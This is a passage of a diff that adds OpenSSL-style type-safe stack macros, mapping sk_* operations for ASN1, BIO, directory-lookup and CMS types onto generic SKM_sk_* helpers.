+# define sk_ASN1_INTEGER_insert(st, val, i) SKM_sk_insert(ASN1_INTEGER, (st), (val), (i))
+# define sk_ASN1_INTEGER_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(ASN1_INTEGER, (st), (cmp))
+# define sk_ASN1_INTEGER_dup(st) SKM_sk_dup(ASN1_INTEGER, st)
+# define sk_ASN1_INTEGER_pop_free(st, free_func) SKM_sk_pop_free(ASN1_INTEGER, (st), (free_func))
+# define sk_ASN1_INTEGER_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(ASN1_INTEGER, (st), (copy_func), (free_func))
+# define sk_ASN1_INTEGER_shift(st) SKM_sk_shift(ASN1_INTEGER, (st))
+# define sk_ASN1_INTEGER_pop(st) SKM_sk_pop(ASN1_INTEGER, (st))
+# define sk_ASN1_INTEGER_sort(st) SKM_sk_sort(ASN1_INTEGER, (st))
+# define sk_ASN1_INTEGER_is_sorted(st) SKM_sk_is_sorted(ASN1_INTEGER, (st))
+# define sk_ASN1_OBJECT_new(cmp) SKM_sk_new(ASN1_OBJECT, (cmp))
+# define sk_ASN1_OBJECT_new_null() SKM_sk_new_null(ASN1_OBJECT)
+# define sk_ASN1_OBJECT_free(st) SKM_sk_free(ASN1_OBJECT, (st))
+# define sk_ASN1_OBJECT_num(st) SKM_sk_num(ASN1_OBJECT, (st))
+# define sk_ASN1_OBJECT_value(st, i) SKM_sk_value(ASN1_OBJECT, (st), (i))
+# define sk_ASN1_OBJECT_set(st, i, val) SKM_sk_set(ASN1_OBJECT, (st), (i), (val))
+# define sk_ASN1_OBJECT_zero(st) SKM_sk_zero(ASN1_OBJECT, (st))
+# define sk_ASN1_OBJECT_push(st, val) SKM_sk_push(ASN1_OBJECT, (st), (val))
+# define sk_ASN1_OBJECT_unshift(st, val) SKM_sk_unshift(ASN1_OBJECT, (st), (val))
+# define sk_ASN1_OBJECT_find(st, val) SKM_sk_find(ASN1_OBJECT, (st), (val))
+# define sk_ASN1_OBJECT_find_ex(st, val) SKM_sk_find_ex(ASN1_OBJECT, (st), (val))
+# define sk_ASN1_OBJECT_delete(st, i) SKM_sk_delete(ASN1_OBJECT, (st), (i))
+# define sk_ASN1_OBJECT_delete_ptr(st, ptr) SKM_sk_delete_ptr(ASN1_OBJECT, (st), (ptr))
+# define sk_ASN1_OBJECT_insert(st, val, i) SKM_sk_insert(ASN1_OBJECT, (st), (val), (i))
+# define sk_ASN1_OBJECT_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(ASN1_OBJECT, (st), (cmp))
+# define sk_ASN1_OBJECT_dup(st) SKM_sk_dup(ASN1_OBJECT, st)
+# define sk_ASN1_OBJECT_pop_free(st, free_func) SKM_sk_pop_free(ASN1_OBJECT, (st), (free_func))
+# define sk_ASN1_OBJECT_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(ASN1_OBJECT, (st), (copy_func), (free_func))
+# define sk_ASN1_OBJECT_shift(st) SKM_sk_shift(ASN1_OBJECT, (st))
+# define sk_ASN1_OBJECT_pop(st) SKM_sk_pop(ASN1_OBJECT, (st))
+# define sk_ASN1_OBJECT_sort(st) SKM_sk_sort(ASN1_OBJECT, (st))
+# define sk_ASN1_OBJECT_is_sorted(st) SKM_sk_is_sorted(ASN1_OBJECT, (st))
+# define sk_ASN1_STRING_TABLE_new(cmp) SKM_sk_new(ASN1_STRING_TABLE, (cmp))
+# define sk_ASN1_STRING_TABLE_new_null() SKM_sk_new_null(ASN1_STRING_TABLE)
+# define sk_ASN1_STRING_TABLE_free(st) SKM_sk_free(ASN1_STRING_TABLE, (st))
+# define sk_ASN1_STRING_TABLE_num(st) SKM_sk_num(ASN1_STRING_TABLE, (st))
+# define sk_ASN1_STRING_TABLE_value(st, i) SKM_sk_value(ASN1_STRING_TABLE, (st), (i))
+# define sk_ASN1_STRING_TABLE_set(st, i, val) SKM_sk_set(ASN1_STRING_TABLE, (st), (i), (val))
+# define sk_ASN1_STRING_TABLE_zero(st) SKM_sk_zero(ASN1_STRING_TABLE, (st))
+# define sk_ASN1_STRING_TABLE_push(st, val) SKM_sk_push(ASN1_STRING_TABLE, (st), (val))
+# define sk_ASN1_STRING_TABLE_unshift(st, val) SKM_sk_unshift(ASN1_STRING_TABLE, (st), (val))
+# define sk_ASN1_STRING_TABLE_find(st, val) SKM_sk_find(ASN1_STRING_TABLE, (st), (val))
+# define sk_ASN1_STRING_TABLE_find_ex(st, val) SKM_sk_find_ex(ASN1_STRING_TABLE, (st), (val))
+# define sk_ASN1_STRING_TABLE_delete(st, i) SKM_sk_delete(ASN1_STRING_TABLE, (st), (i))
+# define sk_ASN1_STRING_TABLE_delete_ptr(st, ptr) SKM_sk_delete_ptr(ASN1_STRING_TABLE, (st), (ptr))
+# define sk_ASN1_STRING_TABLE_insert(st, val, i) SKM_sk_insert(ASN1_STRING_TABLE, (st), (val), (i))
+# define sk_ASN1_STRING_TABLE_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(ASN1_STRING_TABLE, (st), (cmp))
+# define sk_ASN1_STRING_TABLE_dup(st) SKM_sk_dup(ASN1_STRING_TABLE, st)
+# define sk_ASN1_STRING_TABLE_pop_free(st, free_func) SKM_sk_pop_free(ASN1_STRING_TABLE, (st), (free_func))
+# define sk_ASN1_STRING_TABLE_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(ASN1_STRING_TABLE, (st), (copy_func), (free_func))
+# define sk_ASN1_STRING_TABLE_shift(st) SKM_sk_shift(ASN1_STRING_TABLE, (st))
+# define sk_ASN1_STRING_TABLE_pop(st) SKM_sk_pop(ASN1_STRING_TABLE, (st))
+# define sk_ASN1_STRING_TABLE_sort(st) SKM_sk_sort(ASN1_STRING_TABLE, (st))
+# define sk_ASN1_STRING_TABLE_is_sorted(st) SKM_sk_is_sorted(ASN1_STRING_TABLE, (st))
+# define sk_ASN1_TYPE_new(cmp) SKM_sk_new(ASN1_TYPE, (cmp))
+# define sk_ASN1_TYPE_new_null() SKM_sk_new_null(ASN1_TYPE)
+# define sk_ASN1_TYPE_free(st) SKM_sk_free(ASN1_TYPE, (st))
+# define sk_ASN1_TYPE_num(st) SKM_sk_num(ASN1_TYPE, (st))
+# define sk_ASN1_TYPE_value(st, i) SKM_sk_value(ASN1_TYPE, (st), (i))
+# define sk_ASN1_TYPE_set(st, i, val) SKM_sk_set(ASN1_TYPE, (st), (i), (val))
+# define sk_ASN1_TYPE_zero(st) SKM_sk_zero(ASN1_TYPE, (st))
+# define sk_ASN1_TYPE_push(st, val) SKM_sk_push(ASN1_TYPE, (st), (val))
+# define sk_ASN1_TYPE_unshift(st, val) SKM_sk_unshift(ASN1_TYPE, (st), (val))
+# define sk_ASN1_TYPE_find(st, val) SKM_sk_find(ASN1_TYPE, (st), (val))
+# define sk_ASN1_TYPE_find_ex(st, val) SKM_sk_find_ex(ASN1_TYPE, (st), (val))
+# define sk_ASN1_TYPE_delete(st, i) SKM_sk_delete(ASN1_TYPE, (st), (i))
+# define sk_ASN1_TYPE_delete_ptr(st, ptr) SKM_sk_delete_ptr(ASN1_TYPE, (st), (ptr))
+# define sk_ASN1_TYPE_insert(st, val, i) SKM_sk_insert(ASN1_TYPE, (st), (val), (i))
+# define sk_ASN1_TYPE_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(ASN1_TYPE, (st), (cmp))
+# define sk_ASN1_TYPE_dup(st) SKM_sk_dup(ASN1_TYPE, st)
+# define sk_ASN1_TYPE_pop_free(st, free_func) SKM_sk_pop_free(ASN1_TYPE, (st), (free_func))
+# define sk_ASN1_TYPE_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(ASN1_TYPE, (st), (copy_func), (free_func))
+# define sk_ASN1_TYPE_shift(st) SKM_sk_shift(ASN1_TYPE, (st))
+# define sk_ASN1_TYPE_pop(st) SKM_sk_pop(ASN1_TYPE, (st))
+# define sk_ASN1_TYPE_sort(st) SKM_sk_sort(ASN1_TYPE, (st))
+# define sk_ASN1_TYPE_is_sorted(st) SKM_sk_is_sorted(ASN1_TYPE, (st))
+# define sk_ASN1_UTF8STRING_new(cmp) SKM_sk_new(ASN1_UTF8STRING, (cmp))
+# define sk_ASN1_UTF8STRING_new_null() SKM_sk_new_null(ASN1_UTF8STRING)
+# define sk_ASN1_UTF8STRING_free(st) SKM_sk_free(ASN1_UTF8STRING, (st))
+# define sk_ASN1_UTF8STRING_num(st) SKM_sk_num(ASN1_UTF8STRING, (st))
+# define sk_ASN1_UTF8STRING_value(st, i) SKM_sk_value(ASN1_UTF8STRING, (st), (i))
+# define sk_ASN1_UTF8STRING_set(st, i, val) SKM_sk_set(ASN1_UTF8STRING, (st), (i), (val))
+# define sk_ASN1_UTF8STRING_zero(st) SKM_sk_zero(ASN1_UTF8STRING, (st))
+# define sk_ASN1_UTF8STRING_push(st, val) SKM_sk_push(ASN1_UTF8STRING, (st), (val))
+# define sk_ASN1_UTF8STRING_unshift(st, val) SKM_sk_unshift(ASN1_UTF8STRING, (st), (val))
+# define sk_ASN1_UTF8STRING_find(st, val) SKM_sk_find(ASN1_UTF8STRING, (st), (val))
+# define sk_ASN1_UTF8STRING_find_ex(st, val) SKM_sk_find_ex(ASN1_UTF8STRING, (st), (val))
+# define sk_ASN1_UTF8STRING_delete(st, i) SKM_sk_delete(ASN1_UTF8STRING, (st), (i))
+# define sk_ASN1_UTF8STRING_delete_ptr(st, ptr) SKM_sk_delete_ptr(ASN1_UTF8STRING, (st), (ptr))
+# define sk_ASN1_UTF8STRING_insert(st, val, i) SKM_sk_insert(ASN1_UTF8STRING, (st), (val), (i))
+# define sk_ASN1_UTF8STRING_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(ASN1_UTF8STRING, (st), (cmp))
+# define sk_ASN1_UTF8STRING_dup(st) SKM_sk_dup(ASN1_UTF8STRING, st)
+# define sk_ASN1_UTF8STRING_pop_free(st, free_func) SKM_sk_pop_free(ASN1_UTF8STRING, (st), (free_func))
+# define sk_ASN1_UTF8STRING_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(ASN1_UTF8STRING, (st), (copy_func), (free_func))
+# define sk_ASN1_UTF8STRING_shift(st) SKM_sk_shift(ASN1_UTF8STRING, (st))
+# define sk_ASN1_UTF8STRING_pop(st) SKM_sk_pop(ASN1_UTF8STRING, (st))
+# define sk_ASN1_UTF8STRING_sort(st) SKM_sk_sort(ASN1_UTF8STRING, (st))
+# define sk_ASN1_UTF8STRING_is_sorted(st) SKM_sk_is_sorted(ASN1_UTF8STRING, (st))
+# define sk_ASN1_VALUE_new(cmp) SKM_sk_new(ASN1_VALUE, (cmp))
+# define sk_ASN1_VALUE_new_null() SKM_sk_new_null(ASN1_VALUE)
+# define sk_ASN1_VALUE_free(st) SKM_sk_free(ASN1_VALUE, (st))
+# define sk_ASN1_VALUE_num(st) SKM_sk_num(ASN1_VALUE, (st))
+# define sk_ASN1_VALUE_value(st, i) SKM_sk_value(ASN1_VALUE, (st), (i))
+# define sk_ASN1_VALUE_set(st, i, val) SKM_sk_set(ASN1_VALUE, (st), (i), (val))
+# define sk_ASN1_VALUE_zero(st) SKM_sk_zero(ASN1_VALUE, (st))
+# define sk_ASN1_VALUE_push(st, val) SKM_sk_push(ASN1_VALUE, (st), (val))
+# define sk_ASN1_VALUE_unshift(st, val) SKM_sk_unshift(ASN1_VALUE, (st), (val))
+# define sk_ASN1_VALUE_find(st, val) SKM_sk_find(ASN1_VALUE, (st), (val))
+# define sk_ASN1_VALUE_find_ex(st, val) SKM_sk_find_ex(ASN1_VALUE, (st), (val))
+# define sk_ASN1_VALUE_delete(st, i) SKM_sk_delete(ASN1_VALUE, (st), (i))
+# define sk_ASN1_VALUE_delete_ptr(st, ptr) SKM_sk_delete_ptr(ASN1_VALUE, (st), (ptr))
+# define sk_ASN1_VALUE_insert(st, val, i) SKM_sk_insert(ASN1_VALUE, (st), (val), (i))
+# define sk_ASN1_VALUE_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(ASN1_VALUE, (st), (cmp))
+# define sk_ASN1_VALUE_dup(st) SKM_sk_dup(ASN1_VALUE, st)
+# define sk_ASN1_VALUE_pop_free(st, free_func) SKM_sk_pop_free(ASN1_VALUE, (st), (free_func))
+# define sk_ASN1_VALUE_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(ASN1_VALUE, (st), (copy_func), (free_func))
+# define sk_ASN1_VALUE_shift(st) SKM_sk_shift(ASN1_VALUE, (st))
+# define sk_ASN1_VALUE_pop(st) SKM_sk_pop(ASN1_VALUE, (st))
+# define sk_ASN1_VALUE_sort(st) SKM_sk_sort(ASN1_VALUE, (st))
+# define sk_ASN1_VALUE_is_sorted(st) SKM_sk_is_sorted(ASN1_VALUE, (st))
+# define sk_BIO_new(cmp) SKM_sk_new(BIO, (cmp))
+# define sk_BIO_new_null() SKM_sk_new_null(BIO)
+# define sk_BIO_free(st) SKM_sk_free(BIO, (st))
+# define sk_BIO_num(st) SKM_sk_num(BIO, (st))
+# define sk_BIO_value(st, i) SKM_sk_value(BIO, (st), (i))
+# define sk_BIO_set(st, i, val) SKM_sk_set(BIO, (st), (i), (val))
+# define sk_BIO_zero(st) SKM_sk_zero(BIO, (st))
+# define sk_BIO_push(st, val) SKM_sk_push(BIO, (st), (val))
+# define sk_BIO_unshift(st, val) SKM_sk_unshift(BIO, (st), (val))
+# define sk_BIO_find(st, val) SKM_sk_find(BIO, (st), (val))
+# define sk_BIO_find_ex(st, val) SKM_sk_find_ex(BIO, (st), (val))
+# define sk_BIO_delete(st, i) SKM_sk_delete(BIO, (st), (i))
+# define sk_BIO_delete_ptr(st, ptr) SKM_sk_delete_ptr(BIO, (st), (ptr))
+# define sk_BIO_insert(st, val, i) SKM_sk_insert(BIO, (st), (val), (i))
+# define sk_BIO_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(BIO, (st), (cmp))
+# define sk_BIO_dup(st) SKM_sk_dup(BIO, st)
+# define sk_BIO_pop_free(st, free_func) SKM_sk_pop_free(BIO, (st), (free_func))
+# define sk_BIO_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(BIO, (st), (copy_func), (free_func))
+# define sk_BIO_shift(st) SKM_sk_shift(BIO, (st))
+# define sk_BIO_pop(st) SKM_sk_pop(BIO, (st))
+# define sk_BIO_sort(st) SKM_sk_sort(BIO, (st))
+# define sk_BIO_is_sorted(st) SKM_sk_is_sorted(BIO, (st))
+# define sk_BY_DIR_ENTRY_new(cmp) SKM_sk_new(BY_DIR_ENTRY, (cmp))
+# define sk_BY_DIR_ENTRY_new_null() SKM_sk_new_null(BY_DIR_ENTRY)
+# define sk_BY_DIR_ENTRY_free(st) SKM_sk_free(BY_DIR_ENTRY, (st))
+# define sk_BY_DIR_ENTRY_num(st) SKM_sk_num(BY_DIR_ENTRY, (st))
+# define sk_BY_DIR_ENTRY_value(st, i) SKM_sk_value(BY_DIR_ENTRY, (st), (i))
+# define sk_BY_DIR_ENTRY_set(st, i, val) SKM_sk_set(BY_DIR_ENTRY, (st), (i), (val))
+# define sk_BY_DIR_ENTRY_zero(st) SKM_sk_zero(BY_DIR_ENTRY, (st))
+# define sk_BY_DIR_ENTRY_push(st, val) SKM_sk_push(BY_DIR_ENTRY, (st), (val))
+# define sk_BY_DIR_ENTRY_unshift(st, val) SKM_sk_unshift(BY_DIR_ENTRY, (st), (val))
+# define sk_BY_DIR_ENTRY_find(st, val) SKM_sk_find(BY_DIR_ENTRY, (st), (val))
+# define sk_BY_DIR_ENTRY_find_ex(st, val) SKM_sk_find_ex(BY_DIR_ENTRY, (st), (val))
+# define sk_BY_DIR_ENTRY_delete(st, i) SKM_sk_delete(BY_DIR_ENTRY, (st), (i))
+# define sk_BY_DIR_ENTRY_delete_ptr(st, ptr) SKM_sk_delete_ptr(BY_DIR_ENTRY, (st), (ptr))
+# define sk_BY_DIR_ENTRY_insert(st, val, i) SKM_sk_insert(BY_DIR_ENTRY, (st), (val), (i))
+# define sk_BY_DIR_ENTRY_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(BY_DIR_ENTRY, (st), (cmp))
+# define sk_BY_DIR_ENTRY_dup(st) SKM_sk_dup(BY_DIR_ENTRY, st)
+# define sk_BY_DIR_ENTRY_pop_free(st, free_func) SKM_sk_pop_free(BY_DIR_ENTRY, (st), (free_func))
+# define sk_BY_DIR_ENTRY_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(BY_DIR_ENTRY, (st), (copy_func), (free_func))
+# define sk_BY_DIR_ENTRY_shift(st) SKM_sk_shift(BY_DIR_ENTRY, (st))
+# define sk_BY_DIR_ENTRY_pop(st) SKM_sk_pop(BY_DIR_ENTRY, (st))
+# define sk_BY_DIR_ENTRY_sort(st) SKM_sk_sort(BY_DIR_ENTRY, (st))
+# define sk_BY_DIR_ENTRY_is_sorted(st) SKM_sk_is_sorted(BY_DIR_ENTRY, (st))
+# define sk_BY_DIR_HASH_new(cmp) SKM_sk_new(BY_DIR_HASH, (cmp))
+# define sk_BY_DIR_HASH_new_null() SKM_sk_new_null(BY_DIR_HASH)
+# define sk_BY_DIR_HASH_free(st) SKM_sk_free(BY_DIR_HASH, (st))
+# define sk_BY_DIR_HASH_num(st) SKM_sk_num(BY_DIR_HASH, (st))
+# define sk_BY_DIR_HASH_value(st, i) SKM_sk_value(BY_DIR_HASH, (st), (i))
+# define sk_BY_DIR_HASH_set(st, i, val) SKM_sk_set(BY_DIR_HASH, (st), (i), (val))
+# define sk_BY_DIR_HASH_zero(st) SKM_sk_zero(BY_DIR_HASH, (st))
+# define sk_BY_DIR_HASH_push(st, val) SKM_sk_push(BY_DIR_HASH, (st), (val))
+# define sk_BY_DIR_HASH_unshift(st, val) SKM_sk_unshift(BY_DIR_HASH, (st), (val))
+# define sk_BY_DIR_HASH_find(st, val) SKM_sk_find(BY_DIR_HASH, (st), (val))
+# define sk_BY_DIR_HASH_find_ex(st, val) SKM_sk_find_ex(BY_DIR_HASH, (st), (val))
+# define sk_BY_DIR_HASH_delete(st, i) SKM_sk_delete(BY_DIR_HASH, (st), (i))
+# define sk_BY_DIR_HASH_delete_ptr(st, ptr) SKM_sk_delete_ptr(BY_DIR_HASH, (st), (ptr))
+# define sk_BY_DIR_HASH_insert(st, val, i) SKM_sk_insert(BY_DIR_HASH, (st), (val), (i))
+# define sk_BY_DIR_HASH_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(BY_DIR_HASH, (st), (cmp))
+# define sk_BY_DIR_HASH_dup(st) SKM_sk_dup(BY_DIR_HASH, st)
+# define sk_BY_DIR_HASH_pop_free(st, free_func) SKM_sk_pop_free(BY_DIR_HASH, (st), (free_func))
+# define sk_BY_DIR_HASH_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(BY_DIR_HASH, (st), (copy_func), (free_func))
+# define sk_BY_DIR_HASH_shift(st) SKM_sk_shift(BY_DIR_HASH, (st))
+# define sk_BY_DIR_HASH_pop(st) SKM_sk_pop(BY_DIR_HASH, (st))
+# define sk_BY_DIR_HASH_sort(st) SKM_sk_sort(BY_DIR_HASH, (st))
+# define sk_BY_DIR_HASH_is_sorted(st) SKM_sk_is_sorted(BY_DIR_HASH, (st))
+# define sk_CMS_CertificateChoices_new(cmp) SKM_sk_new(CMS_CertificateChoices, (cmp))
+# define sk_CMS_CertificateChoices_new_null() SKM_sk_new_null(CMS_CertificateChoices)
+# define sk_CMS_CertificateChoices_free(st) SKM_sk_free(CMS_CertificateChoices, (st))
+# define sk_CMS_CertificateChoices_num(st) SKM_sk_num(CMS_CertificateChoices, (st))
+# define sk_CMS_CertificateChoices_value(st, i) SKM_sk_value(CMS_CertificateChoices, (st), (i))
+# define sk_CMS_CertificateChoices_set(st, i, val) SKM_sk_set(CMS_CertificateChoices, (st), (i), (val))
+# define sk_CMS_CertificateChoices_zero(st) SKM_sk_zero(CMS_CertificateChoices, (st))
+# define sk_CMS_CertificateChoices_push(st, val) SKM_sk_push(CMS_CertificateChoices, (st), (val))
+# define sk_CMS_CertificateChoices_unshift(st, val) SKM_sk_unshift(CMS_CertificateChoices, (st), (val))
+# define sk_CMS_CertificateChoices_find(st, val) SKM_sk_find(CMS_CertificateChoices, (st), (val))
+# define sk_CMS_CertificateChoices_find_ex(st, val) SKM_sk_find_ex(CMS_CertificateChoices, (st), (val))
+# define sk_CMS_CertificateChoices_delete(st, i) SKM_sk_delete(CMS_CertificateChoices, (st), (i))
+# define sk_CMS_CertificateChoices_delete_ptr(st, ptr) SKM_sk_delete_ptr(CMS_CertificateChoices, (st), (ptr))
+# define sk_CMS_CertificateChoices_insert(st, val, i) SKM_sk_insert(CMS_CertificateChoices, (st), (val), (i))
+# define sk_CMS_CertificateChoices_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(CMS_CertificateChoices, (st), (cmp))
+# define sk_CMS_CertificateChoices_dup(st) SKM_sk_dup(CMS_CertificateChoices, st)
+# define sk_CMS_CertificateChoices_pop_free(st, free_func) SKM_sk_pop_free(CMS_CertificateChoices, (st), (free_func))
+# define sk_CMS_CertificateChoices_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(CMS_CertificateChoices, (st), (copy_func), (free_func))
+# define sk_CMS_CertificateChoices_shift(st) SKM_sk_shift(CMS_CertificateChoices, (st))
+# define sk_CMS_CertificateChoices_pop(st) SKM_sk_pop(CMS_CertificateChoices, (st))
+# define sk_CMS_CertificateChoices_sort(st) SKM_sk_sort(CMS_CertificateChoices, (st))
+# define sk_CMS_CertificateChoices_is_sorted(st) SKM_sk_is_sorted(CMS_CertificateChoices, (st))
+# define sk_CMS_RecipientEncryptedKey_new(cmp) SKM_sk_new(CMS_RecipientEncryptedKey, (cmp))
+# define sk_CMS_RecipientEncryptedKey_new_null() SKM_sk_new_null(CMS_RecipientEncryptedKey)
+# define sk_CMS_RecipientEncryptedKey_free(st) SKM_sk_free(CMS_RecipientEncryptedKey, (st))
+# define sk_CMS_RecipientEncryptedKey_num(st) SKM_sk_num(CMS_RecipientEncryptedKey, (st))
+# define sk_CMS_RecipientEncryptedKey_value(st, i) SKM_sk_value(CMS_RecipientEncryptedKey, (st), (i))
+# define sk_CMS_RecipientEncryptedKey_set(st, i, val) SKM_sk_set(CMS_RecipientEncryptedKey, (st), (i), (val))
+# define sk_CMS_RecipientEncryptedKey_zero(st) SKM_sk_zero(CMS_RecipientEncryptedKey, (st))
+# define sk_CMS_RecipientEncryptedKey_push(st, val) SKM_sk_push(CMS_RecipientEncryptedKey, (st), (val))
+# define sk_CMS_RecipientEncryptedKey_unshift(st, val) SKM_sk_unshift(CMS_RecipientEncryptedKey, (st), (val))
+# define sk_CMS_RecipientEncryptedKey_find(st, val) SKM_sk_find(CMS_RecipientEncryptedKey, (st), (val))
+# define sk_CMS_RecipientEncryptedKey_find_ex(st, val) SKM_sk_find_ex(CMS_RecipientEncryptedKey, (st), (val))
+# define sk_CMS_RecipientEncryptedKey_delete(st, i) SKM_sk_delete(CMS_RecipientEncryptedKey, (st), (i))
+# define sk_CMS_RecipientEncryptedKey_delete_ptr(st, ptr) SKM_sk_delete_ptr(CMS_RecipientEncryptedKey, (st), (ptr))
+# define sk_CMS_RecipientEncryptedKey_insert(st, val, i) SKM_sk_insert(CMS_RecipientEncryptedKey, (st), (val), (i))
+# define sk_CMS_RecipientEncryptedKey_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(CMS_RecipientEncryptedKey, (st), (cmp))
+# define sk_CMS_RecipientEncryptedKey_dup(st) SKM_sk_dup(CMS_RecipientEncryptedKey, st)
+# define sk_CMS_RecipientEncryptedKey_pop_free(st, free_func) SKM_sk_pop_free(CMS_RecipientEncryptedKey, (st), (free_func))
+# define sk_CMS_RecipientEncryptedKey_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(CMS_RecipientEncryptedKey, (st), (copy_func), (free_func))
+# define sk_CMS_RecipientEncryptedKey_shift(st) SKM_sk_shift(CMS_RecipientEncryptedKey, (st))
+# define sk_CMS_RecipientEncryptedKey_pop(st) SKM_sk_pop(CMS_RecipientEncryptedKey, (st))
+# define sk_CMS_RecipientEncryptedKey_sort(st) SKM_sk_sort(CMS_RecipientEncryptedKey, (st))
+# define sk_CMS_RecipientEncryptedKey_is_sorted(st) SKM_sk_is_sorted(CMS_RecipientEncryptedKey, (st))
+# define sk_CMS_RecipientInfo_new(cmp) SKM_sk_new(CMS_RecipientInfo, (cmp))
+# define sk_CMS_RecipientInfo_new_null() SKM_sk_new_null(CMS_RecipientInfo)
+# define sk_CMS_RecipientInfo_free(st) SKM_sk_free(CMS_RecipientInfo, (st))
+# define sk_CMS_RecipientInfo_num(st) SKM_sk_num(CMS_RecipientInfo, (st))
+# define sk_CMS_RecipientInfo_value(st, i) SKM_sk_value(CMS_RecipientInfo, (st), (i))
+# define sk_CMS_RecipientInfo_set(st, i, val) SKM_sk_set(CMS_RecipientInfo, (st), (i), (val))
+# define sk_CMS_RecipientInfo_zero(st) SKM_sk_zero(CMS_RecipientInfo, (st))
+# define sk_CMS_RecipientInfo_push(st, val) SKM_sk_push(CMS_RecipientInfo, (st), (val))
+# define sk_CMS_RecipientInfo_unshift(st, val) SKM_sk_unshift(CMS_RecipientInfo, (st), (val))
+# define sk_CMS_RecipientInfo_find(st, val) SKM_sk_find(CMS_RecipientInfo, (st), (val))
+# define sk_CMS_RecipientInfo_find_ex(st, val) SKM_sk_find_ex(CMS_RecipientInfo, (st), (val))
+# define sk_CMS_RecipientInfo_delete(st, i) SKM_sk_delete(CMS_RecipientInfo, (st), (i))
+# define sk_CMS_RecipientInfo_delete_ptr(st, ptr) SKM_sk_delete_ptr(CMS_RecipientInfo, (st), (ptr))
+# define sk_CMS_RecipientInfo_insert(st, val, i) SKM_sk_insert(CMS_RecipientInfo, (st), (val), (i))
+# define sk_CMS_RecipientInfo_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(CMS_RecipientInfo, (st), (cmp))
+# define sk_CMS_RecipientInfo_dup(st) SKM_sk_dup(CMS_RecipientInfo, st)
+# define sk_CMS_RecipientInfo_pop_free(st, free_func) SKM_sk_pop_free(CMS_RecipientInfo, (st), (free_func))
+# define sk_CMS_RecipientInfo_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(CMS_RecipientInfo, (st), (copy_func), (free_func))
+# define sk_CMS_RecipientInfo_shift(st) SKM_sk_shift(CMS_RecipientInfo, (st))
+# define sk_CMS_RecipientInfo_pop(st) SKM_sk_pop(CMS_RecipientInfo, (st))
+# define sk_CMS_RecipientInfo_sort(st) SKM_sk_sort(CMS_RecipientInfo, (st))
+# define sk_CMS_RecipientInfo_is_sorted(st) SKM_sk_is_sorted(CMS_RecipientInfo, (st))
+# define sk_CMS_RevocationInfoChoice_new(cmp) SKM_sk_new(CMS_RevocationInfoChoice, (cmp))
+# define sk_CMS_RevocationInfoChoice_new_null() SKM_sk_new_null(CMS_RevocationInfoChoice)
+# define sk_CMS_RevocationInfoChoice_free(st) SKM_sk_free(CMS_RevocationInfoChoice, (st))
+# define sk_CMS_RevocationInfoChoice_num(st) SKM_sk_num(CMS_RevocationInfoChoice, (st))
+# define sk_CMS_RevocationInfoChoice_value(st, i) SKM_sk_value(CMS_RevocationInfoChoice, (st), (i))
+# define sk_CMS_RevocationInfoChoice_set(st, i, val) SKM_sk_set(CMS_RevocationInfoChoice, (st), (i), (val))
+# define sk_CMS_RevocationInfoChoice_zero(st) SKM_sk_zero(CMS_RevocationInfoChoice, (st))
+# define sk_CMS_RevocationInfoChoice_push(st, val) SKM_sk_push(CMS_RevocationInfoChoice, (st), (val))
+# define sk_CMS_RevocationInfoChoice_unshift(st, val) SKM_sk_unshift(CMS_RevocationInfoChoice, (st), (val))
+# define sk_CMS_RevocationInfoChoice_find(st, val) SKM_sk_find(CMS_RevocationInfoChoice, (st), (val))
+# define sk_CMS_RevocationInfoChoice_find_ex(st, val) SKM_sk_find_ex(CMS_RevocationInfoChoice, (st), (val))
+# define sk_CMS_RevocationInfoChoice_delete(st, i) SKM_sk_delete(CMS_RevocationInfoChoice, (st), (i))
+# define sk_CMS_RevocationInfoChoice_delete_ptr(st, ptr) SKM_sk_delete_ptr(CMS_RevocationInfoChoice, (st), (ptr))
+# define sk_CMS_RevocationInfoChoice_insert(st, val, i) SKM_sk_insert(CMS_RevocationInfoChoice, (st), (val), (i))
+# define sk_CMS_RevocationInfoChoice_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(CMS_RevocationInfoChoice, (st), (cmp))
+# define sk_CMS_RevocationInfoChoice_dup(st) SKM_sk_dup(CMS_RevocationInfoChoice, st)
+# define sk_CMS_RevocationInfoChoice_pop_free(st, free_func) SKM_sk_pop_free(CMS_RevocationInfoChoice, (st), (free_func))
+# define sk_CMS_RevocationInfoChoice_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(CMS_RevocationInfoChoice, (st), (copy_func), (free_func))
+# define sk_CMS_RevocationInfoChoice_shift(st) SKM_sk_shift(CMS_RevocationInfoChoice, (st))
+# define sk_CMS_RevocationInfoChoice_pop(st) SKM_sk_pop(CMS_RevocationInfoChoice, (st))
+# define sk_CMS_RevocationInfoChoice_sort(st) SKM_sk_sort(CMS_RevocationInfoChoice, (st))
+# define sk_CMS_RevocationInfoChoice_is_sorted(st) SKM_sk_is_sorted(CMS_RevocationInfoChoice, (st))
+# define sk_CMS_SignerInfo_new(cmp) SKM_sk_new(CMS_SignerInfo, (cmp))
+# define sk_CMS_SignerInfo_new_null() SKM_sk_new_null(CMS_SignerInfo)
+# define sk_CMS_SignerInfo_free(st) SKM_sk_free(CMS_SignerInfo, (st))
+# define sk_CMS_SignerInfo_num(st) SKM_sk_num(CMS_SignerInfo, (st))
